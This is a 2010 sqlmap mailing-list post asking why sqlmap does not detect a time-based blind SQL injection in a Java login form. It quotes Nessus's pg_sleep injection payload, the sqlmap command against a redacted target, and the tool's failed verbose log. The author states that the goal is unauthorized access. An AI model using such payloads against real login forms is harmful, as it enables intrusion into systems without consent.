[sqlmap-users] Problems with time based sql inj.
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Problems with time based sql inj.
|
From: David G. <sk...@gm...> - 2010-04-05 20:38:45
|
I have one site in Java which is only vulnerable to this type of technique
(time-based blind sql inj), where all others simply do not work.
Theoretically speaking, I have a login form that receives 2 parameters from
the user via the POST method, which is the login and password.
I've tried several ways to circumvent this form to gain unauthorized access,
but i not get success in the handling of sql injection. However, nessus
reported that the field is vulnerable to Time-Based Sql Injection by
manipulating the parameter j_username with the following query:
j_username = ';%20select%20pg_sleep%20(10)--
Tested the failure, I noticed that you can only make a time-based blind sql
injection. But even passing the parameter --time-test for the sqlmap, and
setting the option in sqlmap.conf timetest to true, does not make sqlmap
test time-based sql inj.
# ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data
"action=Login&j_password=&j_username=" -p j_username -v 2 --time-test
--time-sec 4 --dbms postgresql
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:34:40
[17:34:40] [DEBUG] initializing the configuration
[17:34:40] [DEBUG] initializing the knowledge base
[17:34:40] [DEBUG] cleaning up configuration parameters
[17:34:40] [DEBUG] setting the HTTP timeout
[17:34:40] [DEBUG] setting the HTTP method to GET
[17:34:40] [DEBUG] creating HTTP requests opener object
[17:34:40] [DEBUG] forcing back-end DBMS to user defined value
[17:34:40] [DEBUG] parsing XML queries file
[17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as
session file
[17:34:40] [INFO] testing connection to the target url
sqlmap got a 302 redirect to
http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What
target address do you want to use from now on?
http://xxx:80/xxx/j_xxx_xxx(default) or provide another target address
based also on the redirection
got from the application
>
[17:34:41] [WARNING] the testable parameter 'j_username' you provided is not
into the Cookie
[17:34:41] [INFO] testing if the url is stable, wait a few seconds
[17:34:42] [INFO] url is stable
[17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with
0 parenthesis
[17:34:42] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:42] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:42] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:42] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:42] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
1 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
2 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2
parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with
3 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric
injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string
injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted
string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter
'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string
injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST
parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted
string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3
parenthesis
[17:34:43] [WARNING] POST parameter 'j_username' is not injectable
[17:34:43] [ERROR] all parameters are not injectable
[*] shutting down at: 17:34:43
# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)
--
David Gomes Guimarães
|
